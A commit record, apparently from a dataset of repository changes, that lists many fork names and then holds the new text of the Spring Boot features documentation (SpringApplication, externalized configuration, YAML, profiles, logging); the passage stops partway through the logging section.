-boot,kayelau\/spring-boot,mohican0607\/spring-boot,fogone\/spring-boot,jayeshmuralidharan\/spring-boot,mdeinum\/spring-boot,Makhlab\/spring-boot,jrrickard\/spring-boot,bbrouwer\/spring-boot,rmoorman\/spring-boot,afroje-reshma\/spring-boot-sample,domix\/spring-boot,Makhlab\/spring-boot,PraveenkumarShethe\/spring-boot,peteyan\/spring-boot,nghialunhaiha\/spring-boot,yangdd1205\/spring-boot,fjlopez\/spring-boot,jcastaldoFoodEssentials\/spring-boot,fulvio-m\/spring-boot,ameraljovic\/spring-boot,ralenmandao\/spring-boot,nurkiewicz\/spring-boot,eddumelendez\/spring-boot,mackeprm\/spring-boot,orangesdk\/spring-boot,hqrt\/jenkins2-course-spring-boot,eonezhang\/spring-boot,candrews\/spring-boot,brettwooldridge\/spring-boot,lenicliu\/spring-boot,minmay\/spring-boot,artembilan\/spring-boot,sbuettner\/spring-boot,liupd\/spring-boot,jxblum\/spring-boot,roberthafner\/spring-boot,philwebb\/spring-boot,auvik\/spring-boot,tsachev\/spring-boot,zhangshuangquan\/spring-root,navarrogabriela\/spring-boot,smayoorans\/spring-boot,drunklite\/spring-boot,Xaerxess\/spring-boot,murilobr\/spring-boot,prasenjit-net\/spring-boot,liupugong\/spring-boot,VitDevelop\/spring-boot,mosoft521\/spring-boot,fjlopez\/spring-boot,deki\/spring-boot,soul2zimate\/spring-boot,SPNilsen\/spring-boot,kamilszymanski\/spring-boot,bsodzik\/spring-boot,wilkinsona\/spring-boot,lokbun\/spring-boot,ChunPIG\/spring-boot,nisuhw\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,liupugong\/spring-boot,soul2zimate\/spring-boot,jforge\/spring-boot,cbtpro\/spring-boot,forestqqqq\/spring-boot,smayoorans\/spring-boot,master-slave\/spring-boot,gorcz\/spring-boot,zorosteven\/spring-boot,chrylis\/spring-boot,ollie314\/spring-boot,habuma\/spring-boot,candrews\/spring-boot,ChunPIG\/spring-boot,joansmith\/spring-boot,jmnarloch\/spring-boot,ilayaperumalg\/spring-boot,jcastaldoFoodEssentials\/spring-boot,hehuabing\/spring-boot,sebastiankirsch\/spring-boot,prakashme\/spring-boot,srikalyan\/spring-boot,jbovet\/spring-boot,lenicliu\/spring-boot,duandf35\/spring-boot,mdeinum\/spring-boot,durai145\/spring-boot,wwadge\/spring-boot,nghiavo\/spring-boot,lenicliu\/spring-boot,pnambiarsf\/spring-boot,htynkn\/spring-boot,Xaerxess\/spring-boot,paddymahoney\/spring-boot,raiamber1\/spring-boot,javyzheng\/spring-boot,mebinjacob\/spring-boot,mbrukman\/spring-boot,lokbun\/spring-boot,mrumpf\/spring-boot,RobertNickens\/spring-boot,bclozel\/spring-boot,eonezhang\/spring-boot,sbcoba\/spring-boot,srikalyan\/spring-boot,htynkn\/spring-boot,thomasdarimont\/spring-boot,allyjunio\/spring-boot,fjlopez\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,ydsakyclguozi\/spring-boot,felipeg48\/spring-boot,npcode\/spring-boot,dfa1\/spring-boot,hklv\/spring-boot,fogone\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,DeezCashews\/spring-boot,mdeinum\/spring-boot,dreis2211\/spring-boot,rstirling\/spring-boot,spring-projects\/spring-boot,gregturn\/spring-boot,sbuettner\/spring-boot,afroje-reshma\/spring-boot-sample,liupd\/spring-boot,nandakishorm\/spring-boot,ptahchiev\/spring-boot,fulvio-m\/spring-boot,eliudiaz\/spring-boot,pvorb\/spring-boot,domix\/spring-boot,ydsakyclguozi\/spring-boot,chrylis\/spring-boot,jorgepgjr\/spring-boot,vaseemahmed01\/spring-boot,jack-luj\/spring-boot,paddymahoney\/spring-boot,mbenson\/spring-boot,neo4j-contrib\/spring-boot,tbadie\/spring-boot,drumonii\/spring-boot,zorosteven\/spring-boot,shangyi0102\/spring-boot,bsodzik\/spring-boot,yhj630520\/spring-boot,xiaoleiPENG\/my-project,roberthafner\/spring-boot,jayarampradhan\/spring-boot,hqrt\/jenkins2-course-spring-boot,forestqqqq\/spring-boot,ractive\/spring-boot,zhanhb\/spring-boot,jxblum\/spring-boot,jorgepgjr\/spring-boot,htynkn\/spring-boot,JiweiWong\/spring-boot,johnktims\/spring-boot,ydsakyclguozi\/spring-boot,olivergierke\/spring-boot,donthadineshkumar\/spring-boot,damoyang\/spring-boot,ollie314\/spring-boot,tan9\/spring-boot,mabernardo\/spring-boot,simonnordberg\/spring-boot,ameraljovic\/spring-boot,xwjxwj30abc\/spring-boot,SPNilsen\/spring-boot,mbogoevici\/spring-boot,xwjxwj30abc\/spring-boot,mackeprm\/spring-boot,kamilszymanski\/spring-boot,nareshmiriyala\/spring-boot,ilayaperumalg\/spring-boot,axelfontaine\/spring-boot,existmaster\/spring-boot,Buzzardo\/spring-boot,chrylis\/spring-boot,simonnordberg\/spring-boot,yhj630520\/spring-boot,na-na\/spring-boot,mbenson\/spring-boot,paweldolecinski\/spring-boot,MrMitchellMoore\/spring-boot,mlc0202\/spring-boot,end-user\/spring-boot,Makhlab\/spring-boot,mabernardo\/spring-boot,nghialunhaiha\/spring-boot,vpavic\/spring-boot,deki\/spring-boot,michael-simons\/spring-boot,vakninr\/spring-boot,M3lkior\/spring-boot,mouadtk\/spring-boot,javyzheng\/spring-boot,RobertNickens\/spring-boot,ameraljovic\/spring-boot,fjlopez\/spring-boot,xingguang2013\/spring-boot,RobertNickens\/spring-boot,Chomeh\/spring-boot,ojacquemart\/spring-boot,ApiSecRay\/spring-boot,lcardito\/spring-boot,vandan16\/Vandan,rizwan18\/spring-boot,mbenson\/spring-boot,felipeg48\/spring-boot,mrumpf\/spring-boot,navarrogabriela\/spring-boot,shangyi0102\/spring-boot,tiarebalbi\/spring-boot,end-user\/spring-boot,huangyugui\/spring-boot,paweldolecinski\/spring-boot,srinivasan01\/spring-boot,coolcao\/spring-boot,johnktims\/spring-boot,na-na\/spring-boot,forestqqqq\/spring-boot,yangdd1205\/spring-boot,philwebb\/spring-boot-concourse,JiweiWong\/spring-boot,Charkui\/spring-boot,rmoorman\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"[[boot-features]]\n= Spring Boot features\n\n[partintro]\n--\nThis section dives into the details of Spring Boot. Here you can learn about the key\nfeatures that you will want to use and customize. If you haven't already, you might want\nto read the '<<getting-started.adoc#getting-started>>' and\n'<<using-spring-boot.adoc#using-boot>>' sections so that you have a good grounding\nof the basics.\n--\n\n\n\n[[boot-features-spring-application]]\n== SpringApplication\nThe `SpringApplication` class provides a convenient way to bootstrap a Spring application\nthat will be started from a `main()` method. In many situations you can just delegate to\nthe static `SpringApplication.run` method:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(MySpringConfiguration.class, args);\n\t}\n----\n\nWhen your application starts you should see something similar to the following:\n\n[indent=0,subs=\"attributes\"]\n----\n . ____ _ __ _ _\n \/\\\\ \/ ___'_ __ _ _(_)_ __ __ _ \\ \\ \\ \\\n( ( )\\___ | '_ | '_| | '_ \\\/ _` | \\ \\ \\ \\\n \\\\\/ ___)| |_)| | | | | || (_| | ) ) ) )\n ' |____| .__|_| |_|_| |_\\__, | \/ \/ \/ \/\n =========|_|==============|___\/=\/_\/_\/_\/\n :: Spring Boot :: v{spring-boot-version}\n\n2013-07-31 00:08:16.117 INFO 56603 --- [ main] o.s.b.s.app.SampleApplication : Starting SampleApplication v0.1.0 on mycomputer with PID 56603 (\/apps\/myapp.jar started by pwebb)\n2013-07-31 00:08:16.166 INFO 56603 --- [ main] ationConfigEmbeddedWebApplicationContext : Refreshing org.springframework.boot.context.embedded.AnnotationConfigEmbeddedWebApplicationContext@6e5a8246: startup date [Wed Jul 31 00:08:16 PDT 2013]; root of context hierarchy\n2014-03-04 13:09:54.912 INFO 41370 --- [ main] .t.TomcatEmbeddedServletContainerFactory : Server initialized with port: 8080\n2014-03-04 13:09:56.501 INFO 41370 --- [ main] o.s.b.s.app.SampleApplication : Started SampleApplication in 2.992 seconds (JVM running for 3.658)\n----\n\nBy default `INFO` logging messages will be shown, including some relevant startup details\nsuch as the user that launched the application.\n\n\n[[boot-features-banner]]\n=== Customizing the Banner\nThe banner that is printed on start up can be changed by adding a `banner.txt` file\nto your classpath, or by setting `banner.location` to the location of such a file.\nIf the file has an unusual encoding you can set `banner.encoding` (default is UTF-8).\n\n\n[[boot-features-customizing-spring-application]]\n=== Customizing SpringApplication\nIf the `SpringApplication` defaults aren't to your taste you can instead create a local\ninstance and customize it. For example, to turn off the banner you would write:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication app = new SpringApplication(MySpringConfiguration.class);\n\t\tapp.setShowBanner(false);\n\t\tapp.run(args);\n\t}\n----\n\nNOTE: The constructor arguments passed to `SpringApplication` are configuration sources\nfor spring beans. In most cases these will be references to `@Configuration` classes, but\nthey could also be references to XML configuration or to packages that should be scanned.\n\nIt is also possible to configure the `SpringApplication` using an `application.properties`\nfile. See '<<boot-features-external-config>>' for details.\n\nFor a complete list of the configuration options, see the\n{dc-spring-boot}\/SpringApplication.{dc-ext}[`SpringApplication` Javadoc].\n\n\n\n[[boot-features-fluent-builder-api]]\n=== Fluent builder API\nIf you need to build an `ApplicationContext` hierarchy (multiple contexts with a\nparent\/child relationship), or if you just prefer using a '`fluent`' builder API, you\ncan use the `SpringApplicationBuilder`.\n\nThe `SpringApplicationBuilder` allows you to chain together multiple method calls, and\nincludes `parent` and `child` methods that allow you to create a hierarchy.\n\nFor example:\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.showBanner(false)\n\t\t.sources(Parent.class)\n\t\t.child(Application.class)\n\t\t.run(args);\n----\n\nNOTE: There are some restrictions when creating an `ApplicationContext` hierarchy, e.g.\nWeb components *must* be contained within the child context, and the same `Environment`\nwill be used for both parent and child contexts. See the\n{dc-spring-boot}\/builder\/SpringApplicationBuilder.{dc-ext}[`SpringApplicationBuilder` javadoc]\nfor full details.\n\n\n\n[[boot-features-application-events-and-listeners]]\n=== Application events and listeners\nIn addition to the usual Spring Framework events, such as\n{spring-javadoc}\/context\/event\/ContextRefreshedEvent.{dc-ext}[`ContextRefreshedEvent`],\na `SpringApplication` sends some additional application events. Some events are actually\ntriggered before the `ApplicationContext` is created.\n\nYou can register event listeners in a number of ways, the most common being\n`SpringApplication.addListeners(...)` method.\n\nApplication events are sent in the following order, as your application runs:\n\n. An `ApplicationStartedEvent` is sent at the start of a run, but before any\n processing except the registration of listeners and initializers.\n. An `ApplicationEnvironmentPreparedEvent` is sent when the `Environment` to be used in\n the context is known, but before the context is created.\n. An `ApplicationPreparedEvent` is sent just before the refresh is started, but after bean\n definitions have been loaded.\n. An `ApplicationFailedEvent` is sent if there is an exception on startup.\n\nTIP: You often won't need to use application events, but it can be handy to know that they\nexist. Internally, Spring Boot uses events to handle a variety of tasks.\n\n\n\n[[boot-features-web-environment]]\n=== Web environment\nA `SpringApplication` will attempt to create the right type of `ApplicationContext` on\nyour behalf. By default, an `AnnotationConfigApplicationContext` or\n`AnnotationConfigEmbeddedWebApplicationContext` will be used, depending on whether you\nare developing a web application or not.\n\nThe algorithm used to determine a '`web environment`' is fairly simplistic (based on the\npresence of a few classes). You can use `setWebEnvironment(boolean webEnvironment)` if\nyou need to override the default.\n\nIt is also possible to take complete control of the `ApplicationContext` type that will\nbe used by calling `setApplicationContextClass(...)`.\n\nTIP: It is often desirable to call `setWebEnvironment(false)` when using `SpringApplication`\nwithin a JUnit test.\n\n\n\n[[boot-features-command-line-runner]]\n=== Using the CommandLineRunner\nIf you want access to the raw command line arguments, or you need to run some specific code\nonce the `SpringApplication` has started you can implement the `CommandLineRunner`\ninterface. The `run(String... args)` method will be called on all Spring beans\nimplementing this interface.\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.*\n\timport org.springframework.stereotype.*\n\n\t@Component\n\tpublic class MyBean implements CommandLineRunner {\n\n\t public void run(String... args) {\n\t \/\/ Do something...\n\t }\n\n\t}\n----\n\nYou can additionally implement the `org.springframework.core.Ordered` interface or use the\n`org.springframework.core.annotation.Order` annotation if several `CommandLineRunner`\nbeans are defined that must be called in a specific order.\n\n\n\n[[boot-features-application-exit]]\n=== Application exit\nEach `SpringApplication` will register a shutdown hook with the JVM to ensure that the\n`ApplicationContext` is closed gracefully on exit. All the standard Spring lifecycle\ncallbacks (such as the `DisposableBean` interface, or the `@PreDestroy` annotation) can\nbe used.\n\nIn addition, beans may implement the `org.springframework.boot.ExitCodeGenerator`\ninterface if they wish to return a specific exit code when the application ends.\n\n\n\n[[boot-features-external-config]]\n== Externalized Configuration\nSpring Boot allows you to externalize your configuration so you can work with the same\napplication code in different environments. You can use properties files, YAML files,\nenvironment variables and command-line arguments to externalize configuration. Property\nvalues can be injected directly into your beans using the `@Value` annotation, accessed\nvia Spring's `Environment` abstraction or bound to structured objects.\n\nSpring Boot uses a very particular `PropertySource` order that is designed to allow\nsensible overriding of values, properties are considered in the the following order:\n\n. Command line arguments.\n. Java System properties (`System.getProperties()`).\n. OS environment variables.\n. JNDI attributes from `java:comp\/env`\n. A `RandomValuePropertySource` that only has properties in `+random.*+`.\n. Application properties outside of your packaged jar (`application.properties`\n including YAML and profile variants).\n. Application properties packaged inside your jar (`application.properties`\n including YAML and profile variants).\n. `@PropertySource` annotations on your `@Configuration` classes.\n. Default properties (specified using `SpringApplication.setDefaultProperties`).\n\nTo provide a concrete example, suppose you develop a `@Component` that uses a\n`name` property:\n\n[source,java,indent=0]\n----\n\timport org.springframework.stereotype.*\n\timport org.springframework.beans.factory.annotation.*\n\n\t@Component\n\tpublic class MyBean {\n\n\t @Value(\"${name}\")\n\t private String name;\n\n\t \/\/ ...\n\n\t}\n----\n\nYou can bundle an `application.properties` inside your jar that provides a sensible\ndefault `name`. When running in production, an `application.properties` can be provided\noutside of your jar that overrides `name`; and for one-off testing, you can launch with\na specific command line switch (e.g. `java -jar app.jar --name=\"Spring\"`).\n\nThe `RandomValuePropertySource` is useful for injecting random values (e.g. into secrets\nor test cases). It can produce integers, longs or strings, e.g.\n\n[source,properties,indent=0]\n----\n\tmy.secret=${random.value}\n\tmy.number=${random.int}\n\tmy.bignumber=${random.long}\n\tmy.number.less.than.ten=${random.int(10)}\n\tmy.number.in.range=${random.int[1024,65536]}\n----\n\nThe `+random.int*+` syntax is `OPEN value (,max) CLOSE` where the `OPEN,CLOSE` are any\ncharacter and `value,max` are integers. If `max` is provided then `value` is the minimum\nvalue and `max` is the maximum (exclusive).\n\n\n\n[[boot-features-external-config-command-line-args]]\n=== Accessing command line properties\nBy default `SpringApplication` will convert any command line option arguments (starting\nwith '`--`', e.g. `--server.port=9000`) to a `property` and add it to the Spring\n`Environment`. As mentioned above, command line properties always take precedence over\nother property sources.\n\nIf you don't want command line properties to be added to the `Environment` you can disable\nthem using `SpringApplication.setAddCommandLineProperties(false)`.\n\n\n\n[[boot-features-external-config-application-property-files]]\n=== Application property files\n`SpringApplication` will load properties from `application.properties` files in the\nfollowing locations and add them to the Spring `Environment`:\n\n. A `\/config` subdir of the current directory.\n. The current directory\n. A classpath `\/config` package\n. The classpath root\n\nThe list is ordered by precedence (locations higher in the list override lower items).\n\nNOTE: You can also <<boot-features-external-config-yaml, use YAML ('.yml') files>> as\nan alternative to '.properties'.\n\nIf you don't like `application.properties` as the configuration file name you can switch\nto another by specifying a `spring.config.name` environment property. You can also refer\nto an explicit location using the `spring.config.location` environment property\n(comma-separated list of directory locations, or file paths).\n\n[indent=0]\n----\n\t$ java -jar myproject.jar --spring.config.name=myproject\n----\n\nor\n\n[indent=0]\n----\n\t$ java -jar myproject.jar --spring.config.location=classpath:\/default.properties,classpath:\/override.properties\n----\n\nIf `spring.config.location` contains directories (as opposed to files) they should end\nin `\/` (and will be appended with the names generated from `spring.config.name` before\nbeing loaded). The default search path `classpath:,classpath:\/config,file:,file:config\/`\nis always used, irrespective of the value of `spring.config.location`. In that way you\ncan set up default values for your application in `application.properties` (or whatever\nother basename you choose with `spring.config.name`) and override it at runtime with a\ndifferent file, keeping the defaults.\n\nNOTE: If you use environment variables rather than system properties, most operating\nsystems disallow period-separated key names, but you can use underscores instead (e.g.\n`SPRING_CONFIG_NAME` instead of `spring.config.name`).\n\nNOTE: If you are running in a container then JNDI properties (in `java:comp\/env`) or\nservlet context initialization parameters can be used instead of, or as well as,\nenvironment variables or system properties.\n\n\n\n[[boot-features-external-config-profile-specific-properties]]\n=== Profile specific properties\nIn addition to `application.properties` files, profile specific properties can also be\ndefined using the naming convention `application-{profile}.properties`.\n\nProfile specific properties are loaded from the same locations as standard\n`application.properties`, with profile specific files overriding the default ones.\n\n\n\n[[boot-features-external-config-placeholders-in-properties]]\n=== Placeholders in properties\nThe values in `application.properties` are filtered through the existing `Environment`\nwhen they are used so you can refer back to previously defined values (e.g. from System\nproperties).\n\n[source,properties,indent=0]\n----\n\tapp.name=MyApp\n\tapp.description=${app.name} is a Spring Boot application\n----\n\nTIP: You can also use this technique to create '`short`' variants of existing Spring Boot\nproperties. See the '<<howto.adoc#howto-use-short-command-line-arguments>>' how-to\nfor details.\n\n\n\n[[boot-features-external-config-yaml]]\n=== Using YAML instead of Properties\nhttp:\/\/yaml.org[YAML] is a superset of JSON, and as such is a very convenient format\nfor specifying hierarchical configuration data. The `SpringApplication` class will\nautomatically support YAML as an alternative to properties whenever you have the\nhttp:\/\/code.google.com\/p\/snakeyaml\/[SnakeYAML] library on your classpath.\n\nNOTE: If you use '`starter POMs`' SnakeYAML will be automatically provided via\n`spring-boot-starter`.\n\n\n\n[[boot-features-external-config-loading-yaml]]\n==== Loading YAML\nSpring Boot provides two convenient classes that can be used to load YAML documents. The\n`YamlPropertiesFactoryBean` will load YAML as `Properties` and the `YamlMapFactoryBean`\nwill load YAML as a `Map`.\n\nFor example, the following YAML document:\n\n[source,yaml,indent=0]\n----\n\tenvironments:\n\t\tdev:\n\t\t\turl: http:\/\/dev.bar.com\n\t\t\tname: Developer Setup\n\t\tprod:\n\t\t\turl: http:\/\/foo.bar.com\n\t\t\tname: My Cool App\n----\n\nWould be transformed into these properties:\n\n[source,properties,indent=0]\n----\n\tenvironments.dev.url=http:\/\/dev.bar.com\n\tenvironments.dev.name=Developer Setup\n\tenvironments.prod.url=http:\/\/foo.bar.com\n\tenvironments.prod.name=My Cool App\n----\n\nYAML lists are represented as property keys with `[index]` dereferencers,\nfor example this YAML:\n\n[source,yaml,indent=0]\n----\n\t my:\n\t\tservers:\n\t\t\t- dev.bar.com\n\t\t\t- foo.bar.com\n----\n\nWould be transformed into these properties:\n\n[source,properties,indent=0]\n----\n\tmy.servers[0]=dev.bar.com\n\tmy.servers[1]=foo.bar.com\n----\n\nTo bind to properties like that using the Spring `DataBinder` utilities (which is what\n`@ConfigurationProperties` does) you need to have a property in the target bean of type\n`java.util.List` (or `Set`) and you either need to provide a setter, or initialize it\nwith a mutable value, e.g. this will bind to the properties above\n\n[source,java,indent=0]\n----\n\t@ConfigurationProperties(prefix=\"my\")\n\tpublic class Config {\n\t\tprivate List<String> servers = new ArrayList<String>();\n\n\t\tpublic List<String> getServers() {\n\t\t\treturn this.servers;\n\t\t}\n\t}\n----\n\n\n\n[[boot-features-external-config-exposing-yaml-to-spring]]\n==== Exposing YAML as properties in the Spring Environment\nThe `YamlPropertySourceLoader` class can be used to expose YAML as a `PropertySource`\nin the Spring `Environment`. This allows you to use the familiar `@Value` annotation with\nplaceholders syntax to access YAML properties.\n\n\n\n[[boot-features-external-config-multi-profile-yaml]]\n==== Multi-profile YAML documents\nYou can specify multiple profile-specific YAML documents in a single file by\nusing a `spring.profiles` key to indicate when the document applies. For example:\n\n[source,yaml,indent=0]\n----\n\tserver:\n\t\taddress: 192.168.1.100\n\t---\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\taddress: 127.0.0.1\n\t---\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\taddress: 192.168.1.120\n----\n\nIn the example above, the `server.address` property will be `127.0.0.1` if the\n`development` profile is active. If the `development` and `production` profiles are *not*\nenabled, then the value for the property will be `192.168.1.100`\n\n\n\n[[boot-features-external-config-yaml-shortcomings]]\n==== YAML shortcomings\nYAML files can't be loaded via the `@PropertySource` annotation. So in the\ncase that you need to load values that way, you need to use a properties file.\n\n\n\n[[boot-features-external-config-typesafe-configuration-properties]]\n=== Typesafe Configuration Properties\nUsing the `@Value(\"${property}\")` annotation to inject configuration properties can\nsometimes be cumbersome, especially if you are working with multiple properties or\nyour data is hierarchical in nature. Spring Boot provides an alternative method\nof working with properties that allows strongly typed beans to govern and validate\nthe configuration of your application. For example:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"connection\")\n\tpublic class ConnectionSettings {\n\n\t\tprivate String username;\n\n\t\tprivate InetAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t}\n----\n\nWhen the `@EnableConfigurationProperties` annotation is applied to your `@Configuration`,\nany beans annotated with `@ConfigurationProperties` will be automatically configured\nfrom the `Environment` properties. This style of configuration works particularly well\nwith the `SpringApplication` external YAML configuration:\n\n[source,yaml,indent=0]\n----\n\t# application.yml\n\n\tconnection:\n\t\tusername: admin\n\t\tremoteAddress: 192.168.1.1\n\n\t# additional configuration as required\n----\n\nTo work with `@ConfigurationProperties` beans you can just inject them in the same way\nas any other bean.\n\n[source,java,indent=0]\n----\n\t@Service\n\tpublic class MyService {\n\n\t\t@Autowired\n\t\tprivate ConnectionSettings connection;\n\n\t \t\/\/...\n\n\t\t@PostConstruct\n\t\tpublic void openConnection() {\n\t\t\tServer server = new Server();\n\t\t\tthis.connection.configure(server);\n\t\t}\n\n\t}\n----\n\nIt is also possible to shortcut the registration of `@ConfigurationProperties` bean\ndefinitions by simply listing the properties classes directly in the\n`@EnableConfigurationProperties` annotation:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@EnableConfigurationProperties(ConnectionSettings.class)\n\tpublic class MyConfiguration {\n\t}\n----\n\n\n\n[[boot-features-external-config-relaxed-binding]]\n==== Relaxed binding\nSpring Boot uses some relaxed rules for binding `Environment` properties to\n`@ConfigurationProperties` beans, so there doesn't need to be an exact match between\nthe `Environment` property name and the bean property name. Common examples where this\nis useful include underscore separated (e.g. `context_path` binds to `contextPath`), and\ncapitalized (e.g. `PORT` binds to `port`) environment properties.\n\nSpring will attempt to coerce the external application properties to the right type when\nit binds to the `@ConfigurationProperties` beans. If you need custom type conversion you\ncan provide a `ConversionService` bean (with bean id `conversionService`) or custom\nproperty editors (via a `CustomEditorConfigurer` bean).\n\n\n\n[[boot-features-external-config-validation]]\n==== @ConfigurationProperties Validation\nSpring Boot will attempt to validate external configuration, by default using JSR-303\n(if it is on the classpath). You can simply add JSR-303 `javax.validation` constraint\nannotations to your `@ConfigurationProperties` class:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"connection\")\n\tpublic class ConnectionSettings {\n\n\t\t@NotNull\n\t\tprivate InetAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t}\n----\n\nYou can also add a custom Spring `Validator` by creating a bean definition called\n`configurationPropertiesValidator`.\n\nTIP: The `spring-boot-actuator` module includes an endpoint that exposes all\n`@ConfigurationProperties` beans. Simply point your web browser to `\/configprops`\nor use the equivalent JMX endpoint. See the\n'<<production-ready-features.adoc#production-ready-endpoints, Production ready features>>'.\nsection for details.\n\n\n[[boot-features-profiles]]\n== Profiles\nSpring Profiles provide a way to segregate parts of your application configuration and\nmake it only available in certain environments. Any `@Component` or `@Configuration` can\nbe marked with `@Profile` to limit when it is loaded:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@Profile(\"production\")\n\tpublic class ProductionConfiguration {\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIn the normal Spring way, you can use a `spring.profiles.active`\n`Environment` property to specify which profiles are active. You can\nspecify the property in any of the usual ways, for example you could\ninclude it in your `application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.profiles.active=dev,hsqldb\n----\n\nor specify on the command line using the switch `--spring.profiles.active=dev,hsqldb`.\n\n\n\n[[boot-features-adding-active-profiles]]\n=== Adding active profiles\nThe `spring.profiles.active` property follows the same ordering rules as other\nproperties, the highest `PropertySource` will win. This means that you can specify\nactive profiles in `application.properties` then *replace* them using the command line\nswitch.\n\nSometimes it is useful to have profile specific properties that *add* to the active\nprofiles rather than replace them. The `spring.profiles.include` property can be used\nto unconditionally add active profiles. The `SpringApplication` entry point also has\na Java API for setting additional profiles (i.e. on top of those activated by the\n`spring.profiles.active` property): see the `setAdditionalProfiles()` method.\n\nFor example, when an application with following properties is run using the switch\n`--spring.profiles.active=prod` the `proddb` and `prodmq` profiles will also be activated:\n\n[source,yaml,indent=0]\n----\n\t---\n\tmy.property: fromyamlfile\n\t---\n\tspring.profiles: prod\n\tspring.profiles.include: proddb,prodmq\n----\n\nNOTE: Remember that the `spring.profiles` property can be defined in a YAML document\nto determine when this particular document is included in the configuration. See\n<<howto-change-configuration-depending-on-the-environment>> for more details.\n\n\n\n[[boot-features-programmatically-setting-profiles]]\n=== Programmatically setting profiles\nYou can programmatically set active profiles by calling\n`SpringApplication.setAdditionalProfiles(...)` before your application runs. It is also\npossible to activate profiles using Spring's `ConfigurableEnvironment` interface.\n\n\n\n[[boot-features-profile-specific-configuration]]\n=== Profile specific configuration files\nProfile specific variants of both `application.properties` (or `application.yml`) and\nfiles referenced via `@ConfigurationProperties` are considered as files are loaded.\nSee '<<boot-features-external-config-profile-specific-properties>>' for details.\n\n\n\n[[boot-features-logging]]\n== Logging\nSpring Boot uses http:\/\/commons.apache.org\/logging[Commons Logging] for all internal\nlogging, but leaves the underlying log implementation open. Default configurations are\nprovided for\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/logging\/package-summary.html[Java Util Logging],\nhttp:\/\/logging.apache.org\/log4j\/[Log4J] and\nhttp:\/\/logback.qos.ch\/[Logback].\nIn each case there is console output and file output (rotating, 10 Mb file size).\n\nBy default, If you use the '`Starter POMs`', Logback will be used for logging. Appropriate\nLogback routing is also included to ensure that dependent libraries that use\nJava Util Logging, Commons Logging, Log4J or SLF4J will all work correctly.\n\nTIP: There are a lot of logging frameworks available for Java. Don't worry if the above\nlist seems confusing. Generally you won't need to change your logging dependencies and\nthe Spring Boot defaults will work just fine.\n\n\n\n[[boot-features-logging-format]]\n=== Log format\nThe default log output from Spring Boot looks like this:\n\n[indent=0]\n----\n2014-03-05 10:57:51.112 INFO 45469 --- [ main] org.apache.catalina.core.StandardEngine : Starting Servlet Engine: Apache Tomcat\/7.0.52\n2014-03-05 10:57:51.253 INFO 45469 --- [ost-startStop-1] o.a.c.c.C.[Tomcat].[localhost].[\/] : Initializing Spring embedded WebApplicationContext\n2014-03-05 10:57:51.253 INFO 45469 --- [ost-startStop-1] o.s.web.context.ContextLoader : Root WebApplicationContext: initialization completed in 1358 ms\n2014-03-05 10:57:51.698 INFO 45469 --- [ost-startStop-1] o.s.b.c.e.ServletRegistrationBean : Mapping servlet: 'dispatcherServlet' to [\/]\n2014-03-05 10:57:51.702 INFO 45469 --- [ost-startStop-1] o.s.b.c.embedded.FilterRegistrationBean : Mapping filter: 'hiddenHttpMethodFilter' to: [\/*]\n----\n\nThe following items are output:\n\n* Date and Time -- Millisecond precision and easily sortable.\n* Log Level -- `ERROR`, `WARN`, `INFO`, `DEBUG` or `TRACE`.\n* Process ID.\n* A `---` separator to distinguish the start of actual log messages.\n* Logger name -- This is usually the source class name (often abbreviated).\n* The log message.\n\n\n\n[[boot-features-logging-console-output]]\n=== Console output\nThe default log configuration will echo messages to the console as they are written. By\ndefault `ERROR`, `WARN` and `INFO` level messages are logged. To also log `DEBUG` level\nmessages to the console you can start your application with a `--debug` flag.\n\n[indent=0]\n----\n\t$ java -jar myapp.jar --debug\n----\n\nIf your terminal supports ANSI, color output will be used to aid readability. You can set\n`spring.output.ansi.enabled` to a\n{dc-spring-boot}\/ansi\/AnsiOutput.Enabled.{dc-ext}[supported value] to override the auto\ndetection.\n\n\n\n[[boot-features-logging-file-output]]\n=== File output\nBy default, log files are written to `spring.log` in your `temp` directory and rotate at\n10 Mb. You can easily customize the output folder by setting the `logging.path` property\n(for example in your `application.properties`). It is also possible to change the filename\nusing a `logging.file` property. Note that if `logging.file` is used, then setting `logging.path` has no effect.\n\nAs with console output, `ERROR`, `WARN` and `INFO` level messages are logged by default.\n\n[[boot-features-custom-log-levels]]\n=== Log Levels\n\nAll the supported logging systems can have the logger levels set in the Spring\n`Environment` (so for example in `application.properties`) using '`+logging.level.*=LEVEL+`'\nwhere '`LEVEL`' is one of TRACE, DEBUG, INFO, WARN, ERROR, FATAL, OFF. Example\n`application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.level.org.springframework.web: DEBUG\n\tlogging.level.org.hibernate: ERROR\n----\n\n\n\n[[boot-features-custom-log-configuration]]\n=== Custom log configuration\n\nThe various logging systems can be activated by including the appropriate libraries on\nthe classpath, and further customized by providing a suitable configuration file in the\nroot of the classpath, or in a location specified by the Spring `Environment` property\n`logging.config`. (Note however that since logging is initialized *before* the\n`ApplicationContext` is created, it isn't possible to control logging from\n`@PropertySources` in Spring `@Configuration` files. System properties and the\nconventional Spring Boot external configuration files work just fine.)\n\nDepending on your logging system, the following files will be loaded:\n\n|===\n|Logging System |Customization\n\n|Logback\n|`logback.xml`\n\n|Log4j\n|`log4j.properties` or `log4j.xml`\n\n|JDK (Java Util Logging)\n|`logging.properties`\n|===\n\nTo help 